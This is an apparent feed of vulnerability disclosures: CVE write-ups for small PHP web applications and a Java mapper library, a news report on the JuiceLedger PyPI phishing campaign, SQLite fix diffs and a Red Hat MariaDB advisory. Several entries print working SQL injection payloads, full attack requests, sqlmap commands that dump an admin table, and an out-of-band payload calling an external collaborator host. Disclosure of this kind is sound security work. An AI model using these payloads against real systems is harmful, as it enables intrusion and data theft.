Garage Management System v1.0 was discovered to contain a persistent cross-site scripting (XSS) vulnerability via the brand_name parameter at /brand.php.

About one week ago, author mayurik released **Garage Management System 1.0** on https://sourcecodester.com. The web application has a lot of vulnerabilities, so let’s take a look at some of them.

**Vendor Homepage:** https://www.sourcecodester.com/users/mayurik 

**Software Link:** **https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html**

**Version:** 1.0

**Test Environment:** Ubuntu 22.04 + Apache2

**Sample Vulnerability 1:**

**Vulnerability**: Persistent Cross-site Scripting

**Component**: Parameter “brand\_name” in /brand.php

**Credits**: Russell Shen

**Cause:** There is no user input sanitization on parameter “brand\_name”.

**Simple PoC**:

**Screenshot of Exploitation:**

**Sample Vulnerability 2:**

**Vulnerability**: SQL Injection

**Component**: Parameter “id” in /print.php

**Credits**: Russell Shen

**Cause:** There is no user input sanitization on parameter “id”.

**Simple PoC**:

http://hostname:port/garage/print.php?id=1 ’\[SQL Query\]

**Screenshot of Exploitation:**

**Sample Vulnerability 3:**

**Vulnerability**: Persistent Cross-site Scripting

**Component**: Parameter “name” in /client.php

**Credits:** Chengcheng Tian, Russell Shen

**Cause:** There is no user input sanitization on parameter “name”.

**Simple PoC**:

**Screenshot of Exploitation:**

**Sample Vulnerability 4:**

**Vulnerability**: Bad Access Control

**Component**: Parameter “brand\_name” in /brand.php

**Credit:** Chengcheng Tian, Russell Shen

**Cause:** /print.php does not verify authentication and authorization.

**Simple PoC**:

Access http://hostname:port/print.php?id=2

**Screenshot of Exploitation:**

Post Views: 41

CVE-2022-36637: Vulnerability of Garage Management System 1.0

Clinic's Patient Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /pms/update_patient.php.

Permalink

Cannot retrieve contributors at this time

**Clinic's Patient Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author： lendme1996

vendors: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code

Vulnerability File: /pms/update\_patient.php?id=

Vulnerability location: /pms/update\_patient.php?id=, id

dbname = pms\_db

\[+\] Payload: /pms/update\_patient.php?id=-1%20union%20select%201,2,database(),4,5,6,7--+ // Leak place ---> id

GET /pms/update\_patient.php?id\=\-1%20union%20select%201,2,database(),4,5,6,7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=odknb2obdq1nkaqk7p7u8hvli8
Connection: close

CVE-2022-36609: bug_report/SQLi-1.md at main · Lendme1996/bug_report

Mapper v4.0.0 to v4.2.0 was discovered to contain a SQL injection vulnerability via the ids parameter at the selectByIds function.

Write the following test demo：  
1、UserController.java：  
@controller  
public class UserController {

    @Autowired
    UserService userService;
    
    @RequestMapping("gets")
    @ResponseBody
    public List<User> getUser(String ids) {
        List<String> idList = Arrays.asList(ids.split(","));
    
        return userService.gets(idList);
    }
    

}  
2、UserService.java：  
@service  
public interface UserService {

    List<User> gets(Collection<String> ids);
    

}  
3、UserServiceImpl.java：  
@service  
public class UserServiceImpl implements UserService {

    @Autowired
    UserMapper userMapper;
    
    @Override
    public List<User> gets(Collection<String> ids) {
        if (ids == null || ids.isEmpty())
            return new ArrayList<>();
        String concatIds = StringUtils.concat(ids, "'", ",");
        return (List<User>) userMapper.selectByIds(concatIds);
    }
    

}  
4、UserMapper.java：  
@org.apache.ibatis.annotations.Mapper  
public interface UserMapper extends Mapper, MySqlMapper, IdsMapper {

}  
5、Access the /gets route in the above demo for sql injection attack：  
（1）Under normal circumstances, when the ids parameter value is passed in 1, 2, the data with id 1 and 2 can be obtained：  
  
（2）But when the ids parameter value is 1') or 1=1-- -, you can get all the data in the database：

CVE-2022-36594: selectByIds function sql injection · Issue #862 · abel533/Mapper

Online Food Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the component /dishes.php?res_id=.

\# Online Food Ordering System Unauthenticated Sql Injection \* Exploit Date: 7/25/2022 \* Exploit Author: Leu Xuan Hieu # Exploit \* Injection Point => \`/dishes.php?res\_id=\` !\[\](https://i.imgur.com/qdPtouQ.jpg) \* Used Burp Suite capture request then save as \`food.txt\` \`\`\`python= python3 sqlmap.py -r food.txt -batch -current-db \`\`\` !\[\](https://i.imgur.com/kLRKlCD.png) \`\`\`python= python3 sqlmap.py -r food.txt -batch -D onlinefoodphp -tables \`\`\` !\[\](https://i.imgur.com/36uDA3J.png) \`\`\`python= python3 sqlmap.py -r food.txt -batch -columns -D onlinefoodphp -T admin -dump \`\`\` !\[\](https://i.imgur.com/J4SlcXJ.png) # POC \* Request \`\`\`python= GET /OnlineFood/dishes.php?res\_id=4'%2b(select%20load\_file('%5c%5c%5c%5c1ik2qvhgl8xqcydf43rujd4j6ac302otrhi48sx.oastify.com%5c%5cztc'))%2b' HTTP/1.1 Host: 192.168.1.101:8888 Cookie: PHPSESSID=311teftqpf9mla9pmac7o6sfq7 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.101:8888/OnlineFood/ Accept-Encoding: gzip, deflate Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Connection: close Cache-Control: max-age=0 \`\`\`

CVE-2022-36759: Online Food Ordering System Unauthenticated Sql Injection - HackMD

"JuiceLedger" has escalated a campaign to distribute its information stealer by now going after developers who published code on the widely used Python code repository.

Security researchers have identified a previously unknown group dubbed "JuiceLedger" as the threat actor behind a recent and first-known phishing campaign specifically targeting users of the Python Package Index (PyPI).

The threat actor first surfaced early this year and is focused on distributing a .NET-based malware called JuiceStealer for searching and stealing browser and cryptocurrency-related information from infected systems.

Initially, JuiceLedger distributed the information stealer via fraudulent Python installer applications. But starting in August, researchers from SentinelOne and Checkmarx observed the attacker also engaged in attempts to poison Python packages on the PyPI repository — presumably to distribute its malware to a wider audience.

The threat actor's modus operandi has involved targeting PyPI users with a phishing email informing them about Google implementing a new validation process for packages published on PyPI. The email claimed the measure was in response to a big increase in malicious PyPI packages getting uploaded to the registry. It warned developers to expeditiously validate their code packages with Google to avoid having them removed from the registry. "Packages not validated before September will be removed promptly," the phishing email noted.

PyPI users who clicked on the link were directed to a webpage, spoofed to look exactly like PyPI's login page. When users entered their credentials there, the page was designed to send that information to a JuiceLedger-controlled domain (linkedopports\[dot\]com). The caper appears to have convinced at least two developers to part with their credentials, which gave JuiceLedger a way to access and poison their relatively widely used PyPI packages with malicious code.

One of the infected packages (version 0.1.6 of "exotel"), for instance, had more than 480,000 total downloads at the time it was infected. The other package (versions 2.0.2 and 4.0.2 of "spam") had some 200,000 downloads. PyPI administrators have since removed both packages, according to Checkmarx.

When installed in a development environment, the code can search for Google Chrome passwords, query Chrome SQLite files, and launch a Python installer contained in the zip named “config.exe," SentinelOne said. The infostealer also looks for logs that contain the word "vault," likely because it is searching for cryptocurrency vaults, and reports the information back to an attacker-controlled command-and-control server over HTTP.

**Broad Campaign**

PyPI admins have also removed "several hundred" typosquatted packages that JuiceLedger published to PyPI as part of a broader effort to distribute its infostealer via the popular Python code repository, both SentinelOne and Checkmarx noted. Their analysis showed the threat actors had inserted a short code snippet in the packages for retrieving a signed variant of JuiceStealer from an attacker-controller URL and executing it.

The code in the typosquatted packages was similar to the code that JuiceLedger had inserted into the two legitimate code packages via its phishing campaign. The attacker-controlled URL that the typosquatted packages communicated with was also the same as the same the one that the poisoned versions of "exotel" and "spam" packages communicated. This allowed researchers at SentinelOne and Checkmarx to conclude JuiceLedger was responsible for both, the PyPI phishing campaign and for uploading the typosquatted packages to PyPI.

JuiceLedger's attack on PyPI in August represents a dangerous escalation in the threat actor's efforts to distribute its information stealer, SentinelOne said. "In August 2022, the threat actor engaged in poisoning open-source packages as a way to target a wider audience with the infostealer through a supply chain attack, raising the threat level posed by this group considerably."

**Popular — but Not the Only — Target**

PyPI recently has become a popular target for attackers trying to poison software supply chains. Countless organizations use the code published in the repository to build their applications. So, by poisoning packages on the registry, attackers can potentially reach a wide audience with relatively little effort. Recent examples include threat actors inserting malicious package installation code in 10 packages published to PyPI, another incident where some 300 developers inadvertently downloaded a package for installing Cobalt Strike from the registry and one where a school-age hacker uploaded ransomware to the registry to see what would transpire.

PyPI is by far not the only code repository that attackers have targeted recently. Security vendors have reported numerous similar incidents involving other widely used registries such as npm and Maven Central. The trend has heightened attention on software supply chain security issues, especially because of the potential for nation-state backed adversaries — like the Russian threat actor behind the SolarWinds compromise — exploiting the same tactic in their attack campaigns.

Attackers are taking advantage of the fact that developers and organizations will always need to use open source packages, says Amitai Ben, threat intelligence researcher at SentinelOne.

The best way to minimize exposure for those contributing open source code to public repositories is to enable two-factor authentication (2FA) on their user account in package managers. That minimizes the risk of account takeover by malicious actors.

Users of open source packages, meanwhile, need to know that popular packages are often connected to Git repositories from which the development process is taking place. "Discrepancies between the repository and the package on the package manager can be a sign of suspicious activity and account takeover," Ben says.

Threat Actor Phishing PyPI Users Identified

In SQlite 3.31.1, a potential null pointer derreference was found in the INTERSEC query processing.

2802
2803
2804
2805
2806
2807
2808

2809
2810
2811
2812
2813
2814
2815

        }
        sqlite3ExprDelete(db, p->pLimit);
        p->pLimit = pLimit;
  
        /\* Generate code to take the intersection of the two temporary
        \*\* tables.
        \*/

        assert( p->pEList );
        iBreak = sqlite3VdbeMakeLabel(pParse);
        iCont = sqlite3VdbeMakeLabel(pParse);
        computeLimitRegisters(pParse, p, iBreak);
        sqlite3VdbeAddOp2(v, OP\_Rewind, tab1, iBreak); VdbeCoverage(v);
        r1 = sqlite3GetTempReg(pParse);
        iStart = sqlite3VdbeAddOp2(v, OP\_RowData, tab1, r1);

>

2802
2803
2804
2805
2806
2807
2808
2809
2810
2811
2812
2813
2814
2815
2816

        }
        sqlite3ExprDelete(db, p->pLimit);
        p->pLimit = pLimit;
  
        /\* Generate code to take the intersection of the two temporary
        \*\* tables.
        \*/
        if( rc ) break;        assert( p->pEList );
        iBreak = sqlite3VdbeMakeLabel(pParse);
        iCont = sqlite3VdbeMakeLabel(pParse);
        computeLimitRegisters(pParse, p, iBreak);
        sqlite3VdbeAddOp2(v, OP\_Rewind, tab1, iBreak); VdbeCoverage(v);
        r1 = sqlite3GetTempReg(pParse);
        iStart = sqlite3VdbeAddOp2(v, OP\_RowData, tab1, r1);

CVE-2020-35525: SQLite: Check-in [a67cf5b7]

In SQLite 3.31.1, there is an out of bounds access problem through ALTER TABLE for views that have a nested FROM clause.

5141
5142
5143
5144
5145
5146
5147
5148
5149
5150
5151
5152
5153
5154
5155

              }
            }else{
              pExpr = pRight;
            }
            pNew = sqlite3ExprListAppend(pParse, pNew, pExpr);
            sqlite3TokenInit(&sColname, zColname);
            sqlite3ExprListSetName(pParse, pNew, &sColname, 0);
            if( pNew && (p->selFlags & SF\_NestedFrom)!=0 ){              struct ExprList\_item \*pX = &pNew->a\[pNew->nExpr-1\];
              sqlite3DbFree(db, pX->zEName);
              if( pSub ){
                pX->zEName = sqlite3DbStrDup(db, pSub->pEList->a\[j\].zEName);
                testcase( pX->zEName==0 );
              }else{
                pX->zEName = sqlite3MPrintf(db, "%s.%s.%s",

|

5141
5142
5143
5144
5145
5146
5147
5148
5149
5150
5151
5152
5153
5154
5155

              }
            }else{
              pExpr = pRight;
            }
            pNew = sqlite3ExprListAppend(pParse, pNew, pExpr);
            sqlite3TokenInit(&sColname, zColname);
            sqlite3ExprListSetName(pParse, pNew, &sColname, 0);
            if( pNew && (p->selFlags & SF\_NestedFrom)!=0 && !IN\_RENAME\_OBJECT ){              struct ExprList\_item \*pX = &pNew->a\[pNew->nExpr-1\];
              sqlite3DbFree(db, pX->zEName);
              if( pSub ){
                pX->zEName = sqlite3DbStrDup(db, pSub->pEList->a\[j\].zEName);
                testcase( pX->zEName==0 );
              }else{
                pX->zEName = sqlite3MPrintf(db, "%s.%s.%s",

CVE-2020-35527: SQLite: Check-in [c431b3fd]

Red Hat Security Advisory 2022-6306-01 - MariaDB is a multi-user, multi-threaded SQL database server. For all practical purposes, MariaDB is binary-compatible with MySQL. Issues addressed include buffer overflow and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: rh-mariadb103-galera and rh-mariadb103-mariadb security and bug fix update  
Advisory ID:       RHSA-2022:6306-01  
Product:           Red Hat Software Collections  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6306  
Issue date:        2022-09-01  
CVE Names:         CVE-2021-46659 CVE-2021-46661 CVE-2021-46663  
                   CVE-2021-46664 CVE-2021-46665 CVE-2021-46668  
                   CVE-2021-46669 CVE-2022-21427 CVE-2022-24048  
                   CVE-2022-24050 CVE-2022-24051 CVE-2022-24052  
                   CVE-2022-27376 CVE-2022-27377 CVE-2022-27378  
                   CVE-2022-27379 CVE-2022-27380 CVE-2022-27381  
                   CVE-2022-27383 CVE-2022-27384 CVE-2022-27386  
                   CVE-2022-27387 CVE-2022-27445 CVE-2022-27447  
                   CVE-2022-27448 CVE-2022-27449 CVE-2022-27452  
                   CVE-2022-27456 CVE-2022-27458 CVE-2022-31622  
                   CVE-2022-31623 CVE-2022-32083 CVE-2022-32085  
                   CVE-2022-32087 CVE-2022-32088  
====================================================================  
1. Summary:

An update for rh-mariadb103-galera and rh-mariadb103-mariadb is now  
available for Red Hat Software Collections.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - ppc64le, s390x, x86_64  
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

MariaDB is a multi-user, multi-threaded SQL database server. For all  
practical purposes, MariaDB is binary-compatible with MySQL.

The following packages have been upgraded to a later upstream version:  
rh-mariadb103-galera (25.3.35), rh-mariadb103-mariadb (10.3.35).

Security Fix(es):

* mariadb: MariaDB through 10.5.9 allows attackers to trigger a  
convert_const_to_int use-after-free when the BIGINT data type is used  
(CVE-2021-46669)

* mysql: Server: FTS unspecified vulnerability (CPU Apr 2022)  
(CVE-2022-21427)

* mariadb: lack of proper validation of the length of user-supplied data  
prior to copying it to a fixed-length stack-based buffer (CVE-2022-24048)

* mariadb: lack of validating the existence of an object prior to  
performing operations on the object (CVE-2022-24050)

* mariadb: lack of proper validation of a user-supplied string before using  
it as a format specifier (CVE-2022-24051)

* mariadb: CONNECT storage engine heap-based buffer overflow  
(CVE-2022-24052)

* mariadb: assertion failure in Item_args::walk_arg (CVE-2022-27376)

* mariadb: use-after-poison when complex conversion is involved in blob  
(CVE-2022-27377)

* mariadb: server crash in create_tmp_table::finalize (CVE-2022-27378)

* mariadb: server crash in component arg_comparator::compare_real_fixed  
(CVE-2022-27379)

* mariadb: server crash at my_decimal::operator= (CVE-2022-27380)

* mariadb: server crash at Field::set_default via specially crafted SQL  
statements (CVE-2022-27381)

* mariadb: use-after-poison in my_strcasecmp_8bit() of ctype-simple.c  
(CVE-2022-27383)

* mariadb: crash via component Item_subselect::init_expr_cache_tracker  
(CVE-2022-27384)

* mariadb: server crashes in query_arena::set_query_arena upon SELECT from  
view (CVE-2022-27386)

* mariadb: assertion failures in decimal_bin_size (CVE-2022-27387)

* mariadb: assertion failure in compare_order_elements (CVE-2022-27445)

* mariadb: use-after-poison in Binary_string::free_buffer (CVE-2022-27447)

* mariadb: crash in multi-update and implicit grouping (CVE-2022-27448)

* mariadb: assertion failure in sql/item_func.cc (CVE-2022-27449)

* mariadb: assertion failure in sql/item_cmpfunc.cc (CVE-2022-27452)

* mariadb: assertion failure in VDec::VDec at /sql/sql_type.cc  
(CVE-2022-27456)

* mariadb: use-after-poison in Binary_string::free_buffer (CVE-2022-27458)

* mariadb: improper locking due to the unreleased lock in  
extra/mariabackup/ds_compress.cc (CVE-2022-31622)

* mariadb: improper locking due to the unreleased lock in  
extra/mariabackup/ds_compress.cc (CVE-2022-31623)

* mariadb: server crash at Item_subselect::init_expr_cache_tracker  
(CVE-2022-32083)

* mariadb: server crash in Item_func_in::cleanup/Item::cleanup_processor  
(CVE-2022-32085)

* mariadb: server crash in Item_args::walk_args (CVE-2022-32087)

* mariadb: segmentation fault in  
Exec_time_tracker::get_loops/Filesort_tracker::report_use/filesort  
(CVE-2022-32088)

* mariadb: Crash executing query with VIEW, aggregate and subquery  
(CVE-2021-46659)

* mariadb: MariaDB allows an application crash in find_field_in_tables and  
find_order_in_list via an unused common table expression (CTE)  
(CVE-2021-46661)

* mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application  
crash via certain SELECT statements (CVE-2021-46663)

* mariadb: MariaDB through 10.5.9 allows an application crash in  
sub_select_postjoin_aggr for a NULL value of aggr (CVE-2021-46664)

* mariadb: MariaDB through 10.5.9 allows a sql_parse.cc application crash  
because of incorrect used_tables expectations (CVE-2021-46665)

* mariadb: MariaDB through 10.5.9 allows an application crash via certain  
long SELECT DISTINCT statements (CVE-2021-46668)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [Tracker] Rebase to Galera 25.3.35 for MariaDB-10.3 (BZ#2107054)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the MariaDB server daemon (mysqld) will be  
restarted automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2049302 - CVE-2021-46659 mariadb: Crash executing query with VIEW, aggregate and subquery  
2050017 - CVE-2021-46661 mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE)  
2050022 - CVE-2021-46663 mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application crash via certain SELECT statements  
2050024 - CVE-2021-46664 mariadb: MariaDB through 10.5.9 allows an application crash in sub_select_postjoin_aggr for a NULL value of aggr  
2050026 - CVE-2021-46665 mariadb: MariaDB through 10.5.9 allows a sql_parse.cc application crash because of incorrect used_tables expectations  
2050032 - CVE-2021-46668 mariadb: MariaDB through 10.5.9 allows an application crash via certain long SELECT DISTINCT statements  
2050034 - CVE-2021-46669 mariadb: MariaDB through 10.5.9 allows attackers to trigger a convert_const_to_int use-after-free when the BIGINT data type is used  
2068211 - CVE-2022-24052 mariadb: CONNECT storage engine heap-based buffer overflow  
2068233 - CVE-2022-24051 mariadb: lack of proper validation of a user-supplied string before using it as a format specifier  
2068234 - CVE-2022-24048 mariadb: lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer  
2069833 - CVE-2022-24050 mariadb: lack of validating the existence of an object prior to performing operations on the object  
2074817 - CVE-2022-27376 mariadb: assertion failure in Item_args::walk_arg  
2074947 - CVE-2022-27377 mariadb: use-after-poison when complex conversion is involved in blob  
2074949 - CVE-2022-27378 mariadb: server crash in create_tmp_table::finalize  
2074951 - CVE-2022-27379 mariadb: server crash in component arg_comparator::compare_real_fixed  
2074966 - CVE-2022-27380 mariadb: server crash at my_decimal::operator2074981 - CVE-2022-27381 mariadb: server crash at Field::set_default via specially crafted SQL statements  
2074996 - CVE-2022-27383 mariadb: use-after-poison in my_strcasecmp_8bit() of ctype-simple.c  
2074999 - CVE-2022-27384 mariadb: crash via component Item_subselect::init_expr_cache_tracker  
2075005 - CVE-2022-27386 mariadb: server crashes in query_arena::set_query_arena upon SELECT from view  
2075006 - CVE-2022-27387 mariadb: assertion failures in decimal_bin_size  
2075691 - CVE-2022-27445 mariadb: assertion failure in compare_order_elements  
2075693 - CVE-2022-27447 mariadb: use-after-poison in Binary_string::free_buffer  
2075694 - CVE-2022-27448 mariadb: crash in multi-update and implicit grouping  
2075695 - CVE-2022-27449 mariadb: assertion failure in sql/item_func.cc  
2075697 - CVE-2022-27456 mariadb: assertion failure in VDec::VDec at /sql/sql_type.cc  
2075700 - CVE-2022-27458 mariadb: use-after-poison in Binary_string::free_buffer  
2076145 - CVE-2022-27452 mariadb: assertion failure in sql/item_cmpfunc.cc  
2082644 - CVE-2022-21427 mysql: Server: FTS unspecified vulnerability (CPU Apr 2022)  
2092354 - CVE-2022-31622 mariadb: improper locking due to the unreleased lock in extra/mariabackup/ds_compress.cc  
2092360 - CVE-2022-31623 mariadb: improper locking due to the unreleased lock in extra/mariabackup/ds_compress.cc  
2104425 - CVE-2022-32083 mariadb: server crash at Item_subselect::init_expr_cache_tracker  
2104431 - CVE-2022-32085 mariadb: server crash in Item_func_in::cleanup/Item::cleanup_processor  
2104434 - CVE-2022-32087 mariadb: server crash in Item_args::walk_args  
2106008 - CVE-2022-32088 mariadb: segmentation fault in Exec_time_tracker::get_loops/Filesort_tracker::report_use/filesort

6. Package List:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):

Source:  
rh-mariadb103-galera-25.3.35-1.el7.src.rpm  
rh-mariadb103-mariadb-10.3.35-1.el7.src.rpm

ppc64le:  
rh-mariadb103-galera-25.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-galera-debuginfo-25.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-backup-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-backup-syspaths-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-common-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-config-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-config-syspaths-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-connect-engine-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-debuginfo-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-devel-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-errmsg-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-gssapi-server-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-oqgraph-engine-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-server-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-server-galera-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-server-galera-syspaths-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-server-syspaths-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-server-utils-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-server-utils-syspaths-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-syspaths-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-test-10.3.35-1.el7.ppc64le.rpm

s390x:  
rh-mariadb103-galera-25.3.35-1.el7.s390x.rpm  
rh-mariadb103-galera-debuginfo-25.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-backup-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-backup-syspaths-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-common-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-config-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-config-syspaths-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-connect-engine-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-debuginfo-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-devel-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-errmsg-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-gssapi-server-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-oqgraph-engine-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-server-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-server-galera-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-server-galera-syspaths-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-server-syspaths-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-server-utils-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-server-utils-syspaths-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-syspaths-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-test-10.3.35-1.el7.s390x.rpm

x86_64:  
rh-mariadb103-galera-25.3.35-1.el7.x86_64.rpm  
rh-mariadb103-galera-debuginfo-25.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-backup-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-backup-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-common-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-config-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-config-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-connect-engine-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-debuginfo-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-devel-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-errmsg-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-gssapi-server-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-oqgraph-engine-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-galera-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-galera-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-utils-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-utils-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-test-10.3.35-1.el7.x86_64.rpm

Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):

Source:  
rh-mariadb103-galera-25.3.35-1.el7.src.rpm  
rh-mariadb103-mariadb-10.3.35-1.el7.src.rpm

x86_64:  
rh-mariadb103-galera-25.3.35-1.el7.x86_64.rpm  
rh-mariadb103-galera-debuginfo-25.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-backup-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-backup-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-common-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-config-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-config-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-connect-engine-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-debuginfo-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-devel-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-errmsg-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-gssapi-server-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-oqgraph-engine-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-galera-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-galera-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-utils-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-utils-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-test-10.3.35-1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-46659  
https://access.redhat.com/security/cve/CVE-2021-46661  
https://access.redhat.com/security/cve/CVE-2021-46663  
https://access.redhat.com/security/cve/CVE-2021-46664  
https://access.redhat.com/security/cve/CVE-2021-46665  
https://access.redhat.com/security/cve/CVE-2021-46668  
https://access.redhat.com/security/cve/CVE-2021-46669  
https://access.redhat.com/security/cve/CVE-2022-21427  
https://access.redhat.com/security/cve/CVE-2022-24048  
https://access.redhat.com/security/cve/CVE-2022-24050  
https://access.redhat.com/security/cve/CVE-2022-24051  
https://access.redhat.com/security/cve/CVE-2022-24052  
https://access.redhat.com/security/cve/CVE-2022-27376  
https://access.redhat.com/security/cve/CVE-2022-27377  
https://access.redhat.com/security/cve/CVE-2022-27378  
https://access.redhat.com/security/cve/CVE-2022-27379  
https://access.redhat.com/security/cve/CVE-2022-27380  
https://access.redhat.com/security/cve/CVE-2022-27381  
https://access.redhat.com/security/cve/CVE-2022-27383  
